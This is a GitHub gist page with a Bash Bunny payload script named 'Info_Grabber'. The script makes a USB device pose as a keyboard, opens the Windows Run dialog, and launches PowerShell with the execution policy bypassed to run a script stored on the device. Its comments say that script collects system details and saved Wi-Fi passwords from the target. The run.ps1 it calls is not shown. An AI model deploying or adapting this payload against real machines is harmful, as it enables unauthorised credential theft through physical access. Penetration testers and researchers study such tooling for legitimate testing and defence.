Skip to content

Instantly share code, notes, and snippets.

@hink

hink/payload.sh Secret

Created May 23, 2017 15:07
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save hink/a8b57d16234042e5adc0182e5e1779c7 to your computer and use it in GitHub Desktop.
Save hink/a8b57d16234042e5adc0182e5e1779c7 to your computer and use it in GitHub Desktop.
#!/bin/bash
#
# Title: Info_Grabber
# Author: Simen Kjeserud
# Version: 1.0
# Target: Windows
# Creds: Hak5Darren for inspiration
#
# Executes run.ps1 which executes scripts that gets you information about
# the computer running and will also get wifi passwords
LED R B 100
ATTACKMODE HID STORAGE
GET SWITCH_POSITION
# Set your language here
QUACK SET_LANGUAGE no
QUACK GUI r
QUACK DELAY 200
# Open run and run the run.ps1 script in the Bashbunny
QUACK STRING powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')"
QUACK ENTER
LED G
#Green means good to go
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment